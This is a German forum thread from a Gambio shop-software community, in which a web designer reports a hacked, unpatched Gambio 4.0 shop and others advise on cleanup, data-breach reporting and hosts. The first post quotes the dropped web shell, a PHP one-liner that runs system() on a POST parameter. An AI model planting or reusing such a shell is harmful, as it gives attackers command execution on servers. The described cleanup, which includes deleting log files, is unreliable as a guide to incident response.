Gambio Hack

Thema wurde von ff-webdesigner, 10. Mai 2024 erstellt.

  1. ff-webdesigner
    ff-webdesigner Erfahrener Benutzer
    Registriert seit:
    22. Januar 2014
    Beiträge:
    548
    Danke erhalten:
    53
    Danke vergeben:
    60
    Hallo beisammen,

    ein neuer Kunde hatte als einziges in einem 4.0 Shop den Sicherheitspatch 2024-02 nicht installiert. Heute informierte ihn der Hoster über Viren auf dem Server. Symptomatik:
    • einige kryptisch benannte php Dateien mit folgendem Code im Root:
    • [{"Expires":1,"Discard":false,"Value":"<?php system($_POST['XXXXXXX']);?>","Path":"\/","Name":"XXXXXXX.XXX","Domain":"XXXXX","Secure":false,"Httponly":false,"Max-Age":3}]
    • ab genau dem Erstellungsdatum der ersten Datei einige kryptische Gastkundenaccounts
    Wir haben:
    • kompletten Shop offline gesetzt
    • alle versuchten dateien seit dem ersten hack gelöscht
    • zip aller dateien erstellt, heruntergeladen und mit 3 virenscannern lokal gescanned. keine weiteren treffer
    • sicherheitspatch 2024-02 installiert - war der die ursache? der patch und hack sind leider nirgends dokumentiert
    • alle passwörter serveradmin, ftp, db geändert
    • caches geleert
    • logfiles gelöscht
    • shop wieder online gesetzt
    Der Shop sollte jetzt nach bestem Wissen wieder sauber und sicher sein. Was meint Ihr?

    Generell ist ein Abfluss von Kundendaten möglich wenn solch ein Hack erfolgte?
     
  2. Orange Raven
    Orange Raven Erfahrener Benutzer
    Registriert seit:
    3. April 2013
    Beiträge:
    387
    Danke erhalten:
    157
    Danke vergeben:
    53
    4.0 ist so alt, dass es auch an Dingen gelegen haben kann, die während des normale Updatezyklus geschlossen wurden. Muss nichtmal an Gambio liegen.

    Lokale Virenscanner können was finden, finden aber in den meisten Fällen nichts. Empfehle hier eher den Hoster anzuschreiben und einen entsprechenden Tiefenscan machen zu lassen.

    Ein Shop mit Version 4.0 ist in keinem Fall sicher. 4 Jahre sind Äonen.

    Und natürlich ist ein Abfluss von Kundendaten möglich. Genau dann wenn Zugriff zur Datenbank bestand.

    Leider gibts für Gambio keine WAF von der Stange. Wäre mal ein interessantes Projekt. Einzige Möglichkeit die ich spontan kenne wäre Cloudflare.
     
  3. Walter Lenk
    Walter Lenk Erfahrener Benutzer
    Registriert seit:
    28. September 2011
    Beiträge:
    623
    Danke erhalten:
    300
    Danke vergeben:
    113
    Guten Morgen zusammen,

    Du schreibst:

    Wir habt ihr diese Dateien identifiziert? Wie habt ihr festgestellt ob es nicht zusätzliche neu angelegte Dateien gab? Wurde das per Dateivergleich gelöst?

    Wenn die Annahme stimmt dass der fehlende Security-Patch die Ursache war könntet ihr Glück haben. Wenn es aber unentdeckte Lücken in der veralteten Shopversion gibt wird es evtl. erneut zu Problemen kommen.

    Nicht vergessen:
    Bei der Datenschutzbehörde melden und Kunden verständigen!

    Grüße
    Walter
     
  4. ff-webdesigner
    ff-webdesigner Erfahrener Benutzer
    Registriert seit:
    22. Januar 2014
    Beiträge:
    548
    Danke erhalten:
    53
    Danke vergeben:
    60
    wir haben alles runtergeladen. lokal mit 3 scannern gecheckt. auf server alle dateien mit änderungsdatum ab x gecheckt. alle wenigen betroffenen dateien gesäuert. provider liess einen weiteren virencheck drüber laufen. alles sauber.

    kundendaten haben wir in dem shop eh keine, dient rein info.

    das einzige was mich interessieren würde: sec patch 2024 dichtet dann wohl sehr sicher eine lücke ab die via gastkonten > rechteausweitung stattfindet? wir hattene einige kryptische gäste drin.
     
  5. Walter Lenk
    Walter Lenk Erfahrener Benutzer
    Registriert seit:
    28. September 2011
    Beiträge:
    623
    Danke erhalten:
    300
    Danke vergeben:
    113
    Hallo,

    danke für Deine Erklärung. Ich denke so besteht schon mal eine gute Gewissheit das alles erwischt wurde. Ich persönlich würde zusätzlich einen Dateivergleich mit einer sauberen Version machen.

    Grüße
    Walter
     
  6. davide_giuri
    davide_giuri Neues Mitglied
    Registriert seit:
    17. Mai 2024
    Beiträge:
    1
    Danke erhalten:
    0
  7. Developer
    Developer Erfahrener Benutzer
    Registriert seit:
    7. November 2012
    Beiträge:
    3.144
    Danke erhalten:
    716
    Danke vergeben:
    127
    Darf ich mal fragen, bei welchem Hoster die Kunden liegen?

    Viele Grüße
     
  8. ff-webdesigner
    ff-webdesigner Erfahrener Benutzer
    Registriert seit:
    22. Januar 2014
    Beiträge:
    548
    Danke erhalten:
    53
    Danke vergeben:
    60
  9. Dennis (MotivMonster.de)
    Dennis (MotivMonster.de) G-WARD 2013/14/15/16
    Registriert seit:
    22. September 2011
    Beiträge:
    31.303
    Danke erhalten:
    6.268
    Danke vergeben:
    1.118
    Beruf:
    Mann für alles :)
    Ort:
    Weilburg
    Kundensupport bei denen ist selbst mitten in der Nacht binnen Stunden und meistens weit über reine Serverseitige Dinge hinaus.
     
  10. Schwabenladen - www.schwabenladen.com
    Registriert seit:
    11. April 2012
    Beiträge:
    36
    Danke erhalten:
    5
    Danke vergeben:
    27
    Ich bin schon seit Jahrzehnten bei Hosteurope und hatt nie Probleme - bis auf 2014 - da hatte ich mehrere Hackerangriffe aus Ägypten und der Türkei - aber bei denen ist auch 24 Stunden ein fachkundiger am Telefon - selbst für Anfänger wie mich...
     
  11. Anonymous
    Anonymous Erfahrener Benutzer
    Registriert seit:
    31. März 2020
    Beiträge:
    204
    Danke erhalten:
    89
    Danke vergeben:
    241
    seit jahrzehnten und dann ein anfänger? hm... das passt für mich irgendwie nicht.
     
  12. Schwabenladen - www.schwabenladen.com
    Registriert seit:
    11. April 2012
    Beiträge:
    36
    Danke erhalten:
    5
    Danke vergeben:
    27
    Bin froh, wenn das Glompp läuft und nicht wieder irgendeind Hacker meint sich im Schwabenladen austoben zu müssen.

    Komm da oft nur mit Hilfe bei Host Europe weiter - aber die checken das richtig und können das vor allem auch richtig verständlich und nachvollziehbar erklären - nicht wie oft schon bei Gamio erlebt, daß man mit Standardantworten oder Fachchinesisch wieder wie der Ochs vor der Apotheke steht.
    Egal um welche Uhrzeit - auch nachts hatte ich schon einen längeren "Nachhilfekurs" mit HostEurope...